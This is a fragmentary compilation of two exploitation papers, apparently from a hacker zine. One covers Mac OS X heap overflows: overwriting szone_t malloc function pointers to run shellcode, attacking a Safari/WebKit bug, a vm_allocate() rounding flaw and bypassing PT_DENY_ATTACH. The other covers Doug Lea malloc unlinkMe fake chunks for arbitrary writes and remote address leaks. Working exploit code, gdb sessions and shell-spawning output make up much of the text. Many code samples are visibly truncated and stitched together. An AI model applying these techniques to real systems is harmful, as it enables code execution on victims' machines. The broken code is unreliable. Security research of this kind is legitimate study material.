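    void   *reserved1;
    void   *reserved2;
    size_t (*size)(struct _malloc_zone_t *zone, const void *ptr);
    void  *(*malloc)(struct _malloc_zone_t *zone, size_t size);
    void  *(*calloc)(struct _malloc_zone_t *zone, size_t num_items, size_t size);
    void  *(*valloc)(struct _malloc_zone_t *zone, size_t size);
    void   (*free)(struct _malloc_zone_t *zone, void *ptr);
    void  *(*realloc)(struct _malloc_zone_t *zone, void *ptr, size_t size);
    void   (*destroy)(struct _malloc_zone_t *zone);
    const char *zone_name;
    /* ... introspection and other callbacks follow ... */
} malloc_zone_t;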
(Well, technically zones are scalable szone_t structs, however the first
element of a szone_t struct consists of a malloc_zone_t struct. This
struct is the most important for us to be familiar with to exploit heap
bugs using the method shown in this paper.)
As you can see, the zone struct contains function pointers for each of the
memory allocation / deallocation functions. This should give you a
pretty good idea of how we can control execution after an overflow.
The size function is used to return the size of the memory allocated. The
destroy() function is used to destroy the entire zone and free all memory
allocated in it.
NOTE:
The malloc_good_size() function is used to return the size of the buffer
after rounding has occurred. An interesting note about this function is
that it contains the same wrap-around bug mentioned in section 5.1:
printf("0x%x\n",malloc_good_size(0xffffffff));
The szone_t struct contains two pointers, for tiny and small block
allocation. These are shown below:
tiny_region_t *tiny_regions;
small_region_t *small_regions;
Memory allocations which are less than around 500 bytes in size
fall into the "tiny" range. These allocations are allocated from a
pool of vm_allocate()'ed regions of memory. Each of these regions
consists of a 1MB (in 32-bit mode) or 2MB (in 64-bit mode) heap,
followed by some meta-data about the region. This meta-data includes
the following fields:
- checksum
- previous
- next
- size
The size field contains the quantum count for the region. A quantum
represents the size of the allocated blocks of memory within the region.
Allocations whose size falls in the range between 500 bytes and four
virtual pages (0x4000 bytes) fall into the "small" category.
Memory allocations of "small" range sized blocks, are allocated from a
pool of small regions, pointed to by the "small_regions" pointer in the
szone_t struct. Again this memory is pre-allocated with the vm_allocate()
function. Each "small" region consists of an 8MB heap, followed by the
same meta-data as tiny regions.
Tiny and small allocations are not always guaranteed to be page aligned.
If a block is allocated which is less than a single virtual page size then
obviously the block cannot be aligned to a page.
As you can see below, the malloc() function is merely a wrapper around
the malloc_zone_malloc() function.
After this the environment variables are read in (any beginning with
"Malloc"), and parsed in order to set the appropriate flags.
-[Summary]:
For the technique contained within this paper, the most important thing
to note is that a szone_t struct is set up in memory. The struct contains
several function pointers which are used to store the address of each of
the appropriate allocation and deallocation functions. When a block of
memory is allocated which falls into the "large" category, the
vm_allocate() mach syscall is used to allocate the memory for this.
Once we receive a SIGTRAP signal and return to the gdb command shell we
can then use the command shown below to locate our initial szone_t
structure in the process memory.
In this struct we can see each of the function pointers which are called
for each of the memory allocation/deallocation functions performed using
the default zone. As well as a pointer to the name of the zone, which can
be useful for debugging.
But is it really feasible to write all the way to the address 0x1800000?
(or 0x2800000 outside of gdb). We will look into this now.
First we will check the addresses various sized memory allocations are
given. The location of each buffer is dependent on whether the
allocation size falls into one of the various sized bins mentioned
earlier (tiny, small or large).
To test the location of each of these we can simply compile and run the
following small c program as shown:
printf("initial_malloc_zones @ 0x%x\n",*malloc_zones);
printf("tiny: %p\n",malloc(22));
printf("small: %p\n",malloc(500));
printf("large: %p\n",malloc(0xffffffff));
return 0;
}
From the output of this program we can see that it is only possible to
write to the initial_malloc_zones struct from a "tiny" or "large"
buffer. Also, in order to overwrite the function pointers contained within
this struct we need to write a considerable amount of data completely
destroying sections of the zone. Thankfully many situations exist in
typical software which allow these criteria to be met. This is discussed
in the final section of this paper.
Now that we understand the layout of the heap a little better, we can use a
small sample program to overwrite the function pointers contained in the
struct to get a shell.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
tmp = malloc(0xdeadbeef);
return 0;
}
(gdb) r
Starting program: /Users/nemo/mtst3
Reading symbols for shared libraries . done
[+] tinyp is @ 0x300120
[+] initial_malloc_zones is @ 0x1800000
[+] Copying 0x14ffef0 bytes.
This is due to the fact that, in between the tinyp pointer and the malloc
function pointer we are trying to overwrite there is some unmapped memory.
In order to get past this we can use the fact that blocks of memory
allocated which fall into the "large" category are allocated using the
#include <stdio.h>
#include <stdlib.h>
#include <malloc.h>
#include <string.h>
extern *malloc_zones;
// small buffer
addr = malloc(22);
printf("[+] malloc_zones (first zone) @ 0x%x\n", *malloc_zones);
printf("[+] addr @ 0x%x\n",addr);
for (a = 0;
a <= ((*malloc_zones - (int) addr) + sizeof(malloc_zone_t)) / 4;
a++)
addr[a] = (int) &shellcode[0];
As you can see below, this code functions as we'd expect and our
shellcode is executed.
-[nemo@gir:~]$ ./heaptst
[+] malloc_zones (first zone) @ 0x2800000
[+] addr @ 0x500120
[+] addr + 36699872 = 0x2800000
[+] Using shellcode @ 0x3014
[+] finished memcpy()
sh-2.05b$
This library contains many bugs, many of which are exploitable using this
technique. Particular attention should be paid to the code which renders
<TABLE></TABLE> blocks ;)
One of the bugs which I have exploited using this particular method
involves an unchecked length being used to allocate and fill an object in
memory with null bytes (\x00).
If we manage to calculate the write so that it stops midway through one
of our function pointers in the szone_t struct, we can effectively
truncate the pointer, causing execution to jump elsewhere.
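A minimal illustration of the idea, with made-up addresses and assuming a
big-endian host (as the PPC is by default):
#include <stdio.h>
#include <stdint.h>
int main (void)
{
    uint32_t fptr = 0x90a1b2c4;                 /* pretend szone malloc pointer */
    unsigned char *bytes = (unsigned char *) &fptr;
    bytes[0] = 0x00;                            /* the '\x00' fill stops...     */
    bytes[1] = 0x00;                            /* ...midway through the ptr    */
    printf ("truncated pointer: 0x%08x\n", fptr);  /* 0x0000b2c4 on big-endian  */
    return 0;
}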
The first step to exploiting this bug is to fire up the debugger (gdb)
and look at what options are available to us.
Once we have Safari loaded up in our debugger, the first thing we need
to check for the exploit to succeed is that we have a clear path to the
initial_malloc_zones struct. To do this in gdb we can put a breakpoint
on the return statement in the malloc() function.
We use the command "disas malloc" to view the assembly listing for the
malloc function. The end of this listing is shown below:
.....
The "heap" tool can also be used to see the sizes and numbers of each
allocation.
There are several methods which can be used to set up the heap
correctly for exploitation. One method, suggested by andrewg, is to use a
.png image in order to control the sizes of allocations which occur.
Apparently this method was learned from zen-parse when exploiting a
mozilla bug in the past.
The method which I have used is to create an HTML page which repeatedly
triggers the overflow with various sizes. After playing around with
this for a while, it was possible to regularly allocate enough memory
for the overflow to occur.
Because of the big-endian nature of the PPC architecture (by default; it
can be changed), the first few bytes in the pointer make all the
difference, and our truncated pointer will now point into the .TEXT
segment.
The following gdb output shows our initial_malloc_zones struct after the
heap has been smashed.
As you can see, the malloc() pointer is now pointing to somewhere in the
.TEXT segment, and the next call to malloc() will take us there. We can
use gdb to view the instructions at this address. As you can see in the
following example.
Here we can see that, for a start, the r31 register must be a valid memory
address. Following this, the dyld_stub_objc_msgSend() function is called
using the "bl" (branch, updating the link register) instruction. Again we
can use gdb to view the instructions in this function.
We can see in these instructions that the r11 register must be a valid
memory address. Other than that, the final two instructions (0xd6874
and 0xd6878) move the value in the r12 register into the count
register before branching to it. This is the equivalent of jumping to
a function pointer in r12. Amazingly, this code construct is exactly
what we need.
Apple have been contacted about a couple of these bugs and are currently
in the process of fixing them.
The WebKit library is open source and available for download, apparently
it won't be too long before Nokia phones use this library for their web
applications. [5]
--[ 5 - Miscellaneous
The reason this works without failure is a subtle bug which exists
in the Darwin kernel's vm_allocate() function.
Here we can see that the page size minus one is simply added to the value
which is to be rounded, before being bitwise AND'ed with the complement of
the PAGE_MASK.
The effect of this macro when rounding large values can be illustrated
using the following code:
#include <stdio.h>
When run (below) it can be seen that the value 0xffffffff will be rounded
to 0.
-[nemo@gir:~]$ ./rounding
0x0
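The same wrap-around can be reproduced with the following stand-alone
sketch (a 4K page size and 32-bit arithmetic are assumed):
#include <stdio.h>
#include <stdint.h>
#define PAGE_SIZE 0x1000u
#define PAGE_MASK (PAGE_SIZE - 1)
#define round_page_32(x) (((uint32_t)(x) + PAGE_MASK) & ~PAGE_MASK)
int main (void)
{
    printf ("0x%x\n", round_page_32 (0xffffffffu));   /* prints 0x0 */
    return 0;
}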
map_size = vm_map_round_page(size);
if (map_addr == 0)
map_addr += PAGE_SIZE;
The code below demonstrates the effect of this on two calls to malloc().
#include <stdio.h>
#include <stdlib.h>
return 0;
When this program is compiled and run (below) we can see that, although
the programmer believes he/she now has a 4GB buffer, only a single page
has been allocated.
-[nemo@gir:~]$ ./ovrflw
B - A: 0x1000
This means that most situations where a user specified length can be
passed to the malloc() function, before being used to copy data, are
exploitable.
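The vulnerable pattern looks roughly like this (a hypothetical sketch,
not code from any particular application):
#include <stdint.h>
#include <stdlib.h>
#include <string.h>
/* hypothetical sketch: a user-supplied length reaches malloc() unchecked
 * and is then reused for the copy; with user_len = 0xffffffff the
 * rounding bug hands back a single page, so the copy runs off the end */
void handle_record (const unsigned char *data, uint32_t user_len)
{
    unsigned char *buf = malloc (user_len);
    if (buf == NULL)
        return;
    memcpy (buf, data, user_len);
    free (buf);
}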
if (!ptr) return;
This means that an address free()'ed twice (a double free) will not
actually be free()'ed the second time, making it hard to exploit
double free()'s in this way.
The small sample program below shows a pointer being allocated and
free()'ed, and then a second pointer of the same size being allocated
and free()'ed twice.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
printf("a: %p\n",a);
free(a);
b = malloc(11);
printf("b: %p\n",b);
free(b);
printf("b: %p\n",a);
free(b);
printf("a: %p\n",a);
return 0;
}
When we compile and run it, as shown below, we can see that pointer "a"
still points to the same address as "b", even after it was free()'ed.
If this condition occurs and we are able to write to, or read from,
pointer "a", we may be able to exploit this for an info leak, or gain
control of execution.
-[nemo@gir:~]$ ./dfr
a: 0x500120
b: 0x500120
b: 0x500120
tst(3575) malloc: *** error for object 0x500120: double free
tst(3575) malloc: *** set a breakpoint in szone_error to debug
a: 0x500120
I have written a small sample program to explain more clearly how this
works. The code below reads a username and password from the user.
It then compares the password to one stored in the file ".skrt". If this
password is the same, the secret code is revealed. Otherwise an error is
printed informing the user that the password was incorrect.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
printf("login: ");
fgets(user,128,stdin);
if (p = strchr(user,'\n'))
*p = '\x00';
goto exit;
}
exit:
if ((fp = fopen(PASSWDFILE,"r")) == NULL)
{
printf("Error loading password file.\n");
exit(1);
}
if (!fgets(skrt,128,fp))
{
exit(1);
}
if (p = strchr(skrt,'\n'))
*p = '\x00';
if (!strcmp(pass,skrt))
{
printf("The combination is 2C,4B,5C\n");
}
else
{
printf("Password Rejected for %s, please try
again\n");
user);
}
fclose(fp);
return 0;
}
When we compile the program and enter an incorrect password we see the
following message:
-[nemo@gir:~]$ ./dfree
login: nemo
Enter your password:
Password Rejected for nemo, please try again.
-[nemo@gir:~]$ ./dfree
login: admin_nemo
Admin user not allowed!
Password Rejected for secret_password, please try again.
-[nemo@gir:~]$ ./dfree
login: nemo
Enter your password:
The combination is 2C,4B,5C
Safari uses the ptrace() syscall to try and stop evil hackers from
debugging their proprietary code. ;). The extract from the
man-page below shows a ptrace() flag which can be used to stop people
being able to debug your code.
PT_DENY_ATTACH
This request is the other operation used by the traced
process; it allows a process that is not currently being
traced to deny future traces by its parent. All other
arguments are ignored. If the process is currently being
traced, it will exit with the exit status of ENOTSUP; oth-
erwise, it sets a flag that denies future traces. An
attempt by the parent to trace a process which has set this
flag will result in a segmentation violation in the parent.
There are a couple of ways to get around this check (that I am aware of).
The first of these is to patch your kernel to stop the PT_DENY_ATTACH call
from doing anything. This is probably the best way; however, it involves
the most effort.
The method which we will use now to look at Safari is to start up gdb and
put a breakpoint on the ptrace() function. This is shown below:
We then run the program, and wait until the breakpoint is hit. When our
breakpoint is triggered, we use the x/10i $pc command (below) to view the
next 10 instructions in the function.
(gdb) r
Starting program: /Applications/Safari.app/Contents/MacOS/Safari
Reading symbols for shared libraries .................... done
At address 0x90054204 we can see the instruction "sc" being executed. This
is the instruction which invokes the syscall itself. It is similar to
int 0x80 on a Linux platform, or sysenter/int 0x2e on Windows.
We can simply replace this "sc" instruction with a nop (no operation)
instruction. This way the syscall will never take place and we can
debug without any problems.
To patch this instruction in gdb we can use the command shown below and
continue execution.
--[ 6 - Conclusion
Although the technique which was described in this paper seems rather
specific, it is still valid, and exploitation of heap bugs in this way is
definitely possible.
When you are able to exploit a bug in this way you can quickly turn a
complicated bug into the equivalent of a simple stack smash (3).
At the time of writing this paper, no protection schemes exist for the
heap on Mac OS X which would stop this technique from working (to my
knowledge).
I'd like to say thanks to my boss Swaraj from Suresec LTD for giving me
time to research the things which i enjoy so much.
I'd also like to say hi to all the guys at Feline Menace, as well as
pulltheplug.org/#social and the Ruxcon team. I'd also like to thank the
Chelsea for providing the AU felinemenace guys with buckets of corona to
fuel our hacking. Thanks as well to duke for pointing out the vm_allocate()
bug and ilja for discussing all of this with me on various occasions.
--[ 7 - References
2) WebKit:
- http://webkit.opendarwin.org/
6) Darwin Source.
- http://www.opensource.apple.com/darwinsource/curr.version.number
7) Bug Me Not
- http://www.bugmenot.com
8) Open Darwin
- http://www.opendarwin.org
7. Advanced Doug lea's malloc exploits - jp
1 - Abstract
2 - Introduction
3 - Automating exploitation problems
4 - The techniques
4.1 - aa4bmo primitive
4.1.1 - First unlinkMe chunk
4.1.1.1 - Proof of concept 1: unlinkMe chunk
4.1.2 - New unlinkMe chunk
4.2 - Heap layout analysis
4.2.1 - Proof of concept 2: Heap layout debugging
4.3 - Layout reset - initial layout prediction - server model
4.4 - Obtaining information from the remote process
4.4.1 - Modifying server static data - finding process' DATA
4.4.2 - Modifying user input - finding shellcode location
4.4.2.1 - Proof of concept 3 : Hitting the output
4.4.3 - Modifying user input - finding libc's data
4.4.3.1 - Proof of concept 4 : Freeing the output
4.4.4 - Vulnerability based heap memory leak - finding libc's DATA
4.5 - Abusing the leaked information
4.5.1 - Recognizing the arena
4.5.2 - Morecore
4.5.2.1 - Proof of concept 5 : Jumping with morecore
4.5.3 - Libc's GOT bruteforcing
4.5.3.1 - Proof of concept 6 : Hinted libc's GOT bruteforcing
4.5.4 - Libc fingerprinting
4.5.5 - Arena corruption (top, last remainder and bin modification)
4.6 - Copying the shellcode 'by hand'
5 - Conclusions
6 - Thanks
7 - References
---------------------------------------------------------------------------
--[ 1. Abstract
This paper details several techniques that allow more generic and reliable
exploitation of processes that provide us with the ability to overwrite
an almost arbitrary 4 byte value at any location.
Higher level techniques will be constructed on top of the unlink() basic
technique (presented in MaXX's article [2]) to exploit processes which
allow an attacker to corrupt Doug Lea's malloc (Linux default's dynamic
memory allocator).
unlink() is used to force specific information leaks of the target process
memory layout. The obtained information is used to exploit the target
without any prior knowledge or hardcoded values, even when randomization
of main object's and/or libraries' load address is present.
---------------------------------------------------------------------------
--[ 2. Introduction
                    malloc                         higher
  vulnerability ->  structures   ->  primitive ->  level
                    corruption                     techniques
  -------------------------------------------------------------------------
  heap overflow     unlink()                       freeing the output
  double free()  -> technique    ->  aa4bmo    ->  hitting the output
  ...                                              cushion chunk
                                                   ...
This paper focuses mainly on the question that arises after we reach the
aa4bmo primitive: what should we do once we know a process allows us to
overwrite four bytes of its memory with almost any arbitrary data?
In addition, tips to reach the aa4bmo primitive in a reliable way are
explained.
---------------------------------------------------------------------------
--] 3. Automating exploitation problems
When trying to answer the question 'what should we do once we know we can
overwrite four bytes of the process memory with almost any arbitrary
data?', we face several problems:
A] how can we be sure we are overwriting the desired bytes with the
desired values?
As the aa4bmo primitive is the underlying layer that allows us to
implement the higher level techniques, we need to be completely sure it is
working as expected, even though we won't know in advance where our data
will be located. Also, in order to be useful, the primitive should not
crash the exploited process.
Typical exploits are target based, hardcoding at least one of the values
required for exploitation, such as the address of a given GOT entry,
depending on the targeted daemon version and the Linux distribution and
release version. Although this simplifies the exploitation process, it is
not always feasible to obtain the required information (i.e. a server can
be configured to lie or to not disclose its version number). Besides, we
may not have the needed information for the target. Bruteforcing more than
one exploit parameter may not always be possible, if each of the values
can't be obtained separately.
There are some well known techniques used to improve the reliability
(probability of success) of a given exploit, but they are only an aid for
improving the exploitation chances. For example, we may pad the shellcode
with more nops, or inject a larger quantity of shellcode into the process
(depending on the process being exploited), assuming there are more
possibilities of hitting it that way. Although these enhancements
will improve the reliability of our exploit, they are not enough for an
exploit to always work on any vulnerable target. In order to create a
fully reliable exploit, we'll need to obtain both the address where our
shellcode gets injected and the address of a function pointer to
overwrite.
---------------------------------------------------------------------------
--] 4. The techniques
We just need a free() call to hit our block after the (X) point to
overwrite 'where' with 'what'.
- chunk_free() tries to look for the next chunk: it takes the chunk's
size (<0) and adds it to the chunk address, always obtaining the sizeA
of the 'nasty chunk' as the start of the next chunk, as all the sizes
after the (X) point are relative to it.
- Then, it checks the prev_inuse bit of our chunk, but as we set it (each
of the sizes after the (X) point has the prev_inuse bit set, the
IS_MMAPPED bit is not set) it does not try to backward consolidate
(because the previous chunk 'seems' to be allocated).
- Finally, it checks if the fake next chunk (our nasty chunk) is free. It
takes its size (-4) to look for the next chunk, obtaining our fake
sizeB, and checks for the prev_inuse flag, which is not set. So, it
tries to unlink our nasty chunk from its bin to coalesce it with the
chunk being freed.
We'll use the following code to show in a simple way the unlinkMe chunk in
action:
int i = 0;
unlinkMe[i++] = -4;
unlinkMe[i++] = -4;
unlinkMe[i++] = WHAT_2_WRITE;
unlinkMe[i++] = WHERE_2_WRITE-8;
for(;i<SZ;i++){
unlinkMe[i] = ((-(i-1) * 4) & ~IS_MMAP) | PREV_INUSE ;
}
free(unlinkMe+SOMEOFFSET);
return 0;
}
(gdb) s
chunk_free (ar_ptr=0x40018040, p=0x8049874) at heapy.c:3221
(gdb) x/20x p
0x8049874: 0xfffffd71 0xfffffd6d 0xfffffd69 0xfffffd65
0x8049884: 0xfffffd61 0xfffffd5d 0xfffffd59 0xfffffd55
0x8049894: 0xfffffd51 0xfffffd4d 0xfffffd49 0xfffffd45
0x80498a4: 0xfffffd41 0xfffffd3d 0xfffffd39 0xfffffd35
0x80498b4: 0xfffffd31 0xfffffd2d 0xfffffd29 0xfffffd25
(gdb) p/x hd
$5 = 0xfffffd6d
(gdb) p/x sz
$6 = 0xfffffd6c
Using the negative relative size, chunk_free() gets the next chunk; let's
see which chunk the 'next' one turns out to be:
3296 sz += nextsz;
3298 if (!islr && next->fd == last_remainder(ar_ptr))
3306 unlink(next, bck, fwd);
The chunk was inserted into one of the bigger bins... as a consequence of
its 'negative' size.
The process won't crash if we are able to maintain this state. If more
calls to free() hit our chunk, it won't crash. But it will crash if a
malloc() call does not find any free chunk to satisfy the allocation
request and tries to split one of the chunks in bin number 126, as
it will try to calculate where the chunk after the fake one is, getting
out of the valid address range because of the big 'negative' size (this
may not happen in a scenario where there is enough memory allocated
between the fake chunk and the top chunk; forcing this layout is not very
difficult when the target server does not impose tight limits on our
request sizes).
!!!!!!!!!! !!!!!!!!!!
0xbfffff00: 0xbfffff00 0x414c0065 0x653d474e 0xbffffef8
0xbfffff10: 0x6f73692e 0x39353838 0x53003531 0x415f4853
0xbfffff20: 0x41504b53 0x2f3d5353 0x2f727375 0x6562696c
for(i=0;i<5;i++) free(unlinkMe+SOMEOFFSET);
to:
This makes our previous unlinkMe chunk fail at two different points on
systems using a newer libc.
public_fREe(Void_t* mem)
{
...
ar_ptr = arena_for_chunk(p);
...
_int_free(ar_ptr, mem);
...
where:
#define arena_for_chunk(ptr) \
(chunk_non_main_arena(ptr) ? heap_for_ptr(ptr)->ar_ptr : &main_arena)
and
So, the fake chunk size has to have its NON_MAIN_ARENA flag not set.
Then, our second problem takes place when the supplied size is masked
with the SIZE_BITS. Older code looked like this:
nextsz = chunksize(next);
0x400152e2 <chunk_free+64>: mov 0x4(%edx),%ecx
0x400152e5 <chunk_free+67>: and $0xfffffffc,%ecx
nextsize = chunksize(nextchunk);
0x42073fe0 <_int_free+112>: mov 0x4(%ecx),%eax
0x42073fe3 <_int_free+115>: mov %ecx,0xffffffec(%ebp)
0x42073fe6 <_int_free+118>: mov %eax,0xffffffe4(%ebp)
0x42073fe9 <_int_free+121>: and $0xfffffff8,%eax
So, we can't use -4 anymore; the smallest size we can provide is -8.
Also, we are no longer able to make every chunk point to our nasty
chunk. The following code shows our new unlinkMe chunk, which solves both
problems:
if(sz<13) sz = 13;
unlinkMe=(unsigned long*)malloc(sz*sizeof(unsigned long));
// 1st nasty chunk
unlinkMe[i++] = -4; // PREV_INUSE is not set
unlinkMe[i++] = -4;
unlinkMe[i++] = -4;
unlinkMe[i++] = what;
unlinkMe[i++] = where-8;
// 2nd nasty chunk
unlinkMe[i++] = -4; // PREV_INUSE is not set
unlinkMe[i++] = -4;
unlinkMe[i++] = -4;
unlinkMe[i++] = what;
unlinkMe[i++] = where-8;
for(;i<sz;i++)
if(i%2)
// relative negative offset to 1st nasty chunk
unlinkMe[i] = ((-(i-8) * 4) & ~(IS_MMAP|NON_MAIN_ARENA)) |
PREV_INUSE;
else
// relative negative offset to 2nd nasty chunk
unlinkMe[i] = ((-(i-3) * 4) & ~(IS_MMAP|NON_MAIN_ARENA)) |
PREV_INUSE;
free(unlinkMe+SOMEOFFSET(sz));
return unlinkMe;
}
The process is similar to the one previously explained for the first
unlinkMe chunk version. Now, we are using two nasty chunks, in order to be
able to point every chunk to one of them. Also, we added a -4 (PREV_INUSE
flag not set) before each of the nasty chunks, which is accessed in step 3
of the '4.1.1 First unlinkMe chunk' section, as -8 is the smallest size we
can provide.
This new version of the unlinkMe chunk works both in older and newer libc
versions. Throughout the article most proof of concept code uses the first
version; replacing the aa4bmoPrimitive() function is enough to obtain an
updated version.
---------------------------------------------------------------------------
--] 4.2 Heap layout analysis
A] chunk size: does the process allocate big memory chunks? is our
input stored in the heap? what commands are stored in the heap?
is there any size limit to our input? am I able to force a heap
top (top_chunk) extension?
B] allocation behavior: are chunks allocated for each of our
connections? what size? are chunks allocated periodically? are
chunks freed periodically? (i.e. async garbage collector, cache
pruning, output buffers, etc)
C] heap holes: does the process leave holes? when? where? what size?
can we fill the hole with our input? can we force the overflow
condition in this hole? what is located after the hole? are we
able to force the creation of holes?
D] original heap layout: is the heap layout predictable after process
initialization? after accepting a client connection? (this is
related to the server mode)
static void
#if __STD_C
heap_dump(arena *ar_ptr)
#else
heap_dump(ar_ptr) arena *ar_ptr;
#endif
{
mchunkptr p;
fprintf(stderr,"sbrk_base %p\n",
(mchunkptr)(((unsigned long)sbrk_base + MALLOC_ALIGN_MASK) &
~MALLOC_ALIGN_MASK));
for(;;) {
fprintf(stderr, "chunk %p 0x%.4x", p, (long)p->size);
if(p == top(ar_ptr)) {
fprintf(stderr, " (T)\n");
break;
} else if(p->size == (0|PREV_INUSE)) {
fprintf(stderr, " (Z)\n");
break;
}
if(inuse(p))
fprintf(stderr," (A)");
else
fprintf(stderr," (F) | 0x%8x | 0x%8x |",p->fd,p->bk);
if((p->fd==last_remainder(ar_ptr))&&(p->bk==last_remainder(ar_ptr)))
fprintf(stderr," (LR)");
else if(p->fd==p->bk & ~inuse(p))
fprintf(stderr," (LC)");
fprintf(stderr,"\n");
p = next_chunk(p);
}
fprintf(stderr,"sbrk_end %p\n",sbrk_base+sbrked_mem);
}
static void
#if __STD_C
heap_layout(arena *ar_ptr)
#else
heap_layout(ar_ptr) arena *ar_ptr;
#endif
{
mchunkptr p;
for(;;p=next_chunk(p)) {
if(p==top(ar_ptr)) {
fprintf(stderr,"|T|\n\n");
break;
}
if((p->fd==last_remainder(ar_ptr))&&(p->bk==last_remainder(ar_ptr))) {
fprintf(stderr,"|L|");
continue;
}
if(inuse(p)) {
fprintf(stderr,"|A|");
continue;
}
fprintf(stderr,"|%lu|",bin_index(p->size));
continue;
}
}
}
static void
#if __STD_C
bin_dump(arena *ar_ptr)
#else
bin_dump(ar_ptr) arena *ar_ptr;
#endif
{
int i;
mbinptr b;
mchunkptr p;
(void)mutex_lock(&ar_ptr->mutex);
We'll use the following code to show how the debug functions help to
analyse the heap layout:
#include <malloc.h>
int main(void){
void *curly,*larry,*moe,*po,*lala,*dipsi,*tw,*piniata;
curly = malloc(256);
larry = malloc(256);
moe = malloc(256);
po = malloc(256);
lala = malloc(256);
free(larry);
free(po);
tw = malloc(128);
piniata = malloc(128);
dipsi = malloc(1500);
free(dipsi);
free(lala);
}
We override the real malloc with our debugging functions; heapy.so also
includes the heap layout dumping functions.
(gdb) r
Starting program: /home/jp/cerebro/heapy/debugging_sample
4 curly = malloc(256);
(gdb) p heap_dump(0x40018040)
(gdb) p bin_dump(0x40018040)
(gdb) p heap_layout(0x40018040)
The first chunk is allocated; note the difference between the requested
size (256 bytes) and the size passed to chunk_alloc(). As there is no
free chunk available, the top needs to be extended and memory is requested
from the operating system. More memory than needed is requested, and the
remaining space is kept as the 'top chunk'.
In the heap_dump()'s output the (A) represents an allocated chunk, while
the (T) means the chunk is the top one. Note the top chunk's size (0x961)
has its last bit set, indicating the previous chunk is allocated:
/* size field is or'ed with PREV_INUSE when previous adjacent chunk in use
*/
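In other words, the low bit of the raw size field is a flag, not part of
the size (a trivial stand-alone illustration):
#include <stdio.h>
#define PREV_INUSE 0x1UL
int main (void)
{
    unsigned long raw = 0x961;
    /* prints: size = 0x960, prev_inuse = 1 */
    printf ("size = 0x%lx, prev_inuse = %lu\n",
            raw & ~PREV_INUSE, raw & PREV_INUSE);
    return 0;
}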
5 larry = malloc(256);
A new chunk is allocated from the remaining space at the top chunk. The
same happens with the next malloc() calls.
6 moe = malloc(256);
7 po = malloc(256);
8 lala = malloc(256);
9 free(larry);
[1679] FREE(0x80496a8) - CHUNK_FREE(0x40018040,0x80496a0)
fronlink(0x80496a0,264,33,0x40018148,0x40018148) new free chunk
A chunk is freed. The frontlink() macro is called to insert the new free
chunk into the corresponding bin:
Note the arena address parameter (ar_ptr) was omitted in the output.
In this case, the chunk at 0x80496a0 was inserted in the bin number 33
according to its size. As this chunk is the only one in its bin (we can
check this in the bin_dump()'s output), it's a lonely chunk (LC) (we'll
see later that being lonely makes 'him' dangerous...), its
bk and fd pointers are equal and point to the bin number 33.
In the heap_layout()'s output, the new free chunk is represented by the
number of the bin where it is located.
10 free(po);
Now, we have two free chunks in the bin number 33. We can appreciate now
how the double linked list is built. The forward pointer of the chunk at
0x80498b0 points to the other chunk in the list, the backward pointer
points to the list head, the bin.
Note that there is no longer a lonely chunk. Also, we can see the
difference between a heap address and a libc address (the bin address),
0x080496a0 and 0x40018148 respectively.
11 tw = malloc(128);
In this case, the requested size for the new allocation is smaller than
the size of the available free chunks. So, the first freed buffer is taken
from the bin with the unlink() macro and split. The first part is
allocated, and the remaining free space is called the 'last remainder',
which is always stored in the first bin, as we can see in the bin_dump()'s
output.
In the heap_layout()'s output, the last remainder chunk is represented
with an L; in the heap_dump()'s output, (LR) is used.
12 piniata = malloc(128);
As the last_remainder size is not enough for the requested allocation, the
last remainder is cleared and inserted as a new free chunk into the
corresponding bin. Then, the other free chunk is taken from its bin and
split as in the previous step.
13 dipsi = malloc(1500);
14 free(dipsi);
The chunk next to the top chunk is freed, so it gets coalesced with it,
and it is not inserted in any bin.
15 free(lala);
Again, but this time also the chunk before the freed chunk is coalesced, as
it was already free.
---------------------------------------------------------------------------
--] 4.3 - Layout reset - initial layout prediction - server model
shot so, for example, bruteforcing and/or 'heap reset' can't be applied.
---------------------------------------------------------------------------
--] 4.4 Obtaining information from the remote process
This technique was originally seen in wuftpd exploits. When the ftpd
process receives a 'help' request, it answers with all the available
commands. These are stored in a table which is part of the process' DATA,
a static structure. The attacker tries to overwrite part of the structure,
using the 'help' command until he sees a change in the server's answer.
Now the attacker knows an absolute address within the process' DATA, and
is able to predict the location of the process' GOT.
The following technique allows the attacker to find the exact location of
the injected shellcode within the process' address space, being
independent of the target process.
To obtain the address, the attacker provides the process with some bogus
data, which is stored in some part of the process. Then, the basic
primitive is used to write 4 bytes at the location where the bogus
data was previously stored. After this, the server is forced to reply
using the supplied bogus data.
If the replayed data differs from the data originally supplied (taking
into account any transformation the server may perform on our input), we
can be sure that next time we send the same input sequence to the server,
it will be stored in the same place. The server's answer may be truncated
if a function expecting NULL-terminated strings is used to craft it, or to
obtain the answer's length before sending it through the network.
In fact, the provided input may be stored multiple times in different
locations; we will only detect a modification when we hit the location
where the server reply is crafted.
Note we are able to try two different addresses for each connection,
speeding up the bruteforcing mechanism.
The main requirement for using this trick is being able to trigger
the aa4bmo primitive between the time the supplied data is stored and the
time the server's reply is built. Understanding the process allocation
behavior, including how each available input command is processed, is
needed.
#include <stdio.h>
#define SZ 256
#define SOMEOFFSET 5 + (rand() % (SZ-1))
#define PREV_INUSE 1
#define IS_MMAP 2
#define OUTPUTSZ 1024
for(contador=1;argv[contador]!=NULL;contador++){
where = strtol(argv[contador], (char **)NULL, 16);
printf("[.] trying %p\n",where);
aa4bmoPrimitive(where,where);
for(i=0;i<OUTPUTSZ;i++)
if(output[i] != 'O'){
printf("(!) you found the output @ %p :(\n",where);
printf("[%s]\n",output);
return 0;
}
printf("(-) output was not @ %p :P\n",where);
}
printf("(x) did not find the output <:|\n");
}
For example, in the CVS 'Directory' double free exploit [7], unrecognized
commands (i.e. 'cucucucucu') are used to populate the server heap. The
server does not answer, just stores the provided data in the heap, and
waits, until a noop or a command is received. After that, the unrecognized
command that was sent is sent back without any modification to the client.
We can provide the server with data almost without any size restriction;
this data is stored in the heap until we force it to be replayed to us.
However, analysing how our unrecognized command is stored in the heap we
find that, instead of what we expected (a single memory chunk with our
data), there are other structures mixed with our input:
This happens because error messages are buffered when generated, waiting
to be flushed: some internal buffering state structures get allocated,
and our data is split and stored in fixed size error buffers.
The user provides a 'cushion chunk' as input to the target process. free()
is called on some part of our input, so our specially crafted chunk is
inserted into one of the last bins (we may know it's empty from the heap
analysis stage, thus avoiding a process crash). When the provided cushion
chunk is inserted into the bin, the bin's address is written into the fd
and bk fields of the chunk's header.
#include <stdio.h>
#define SZ 256
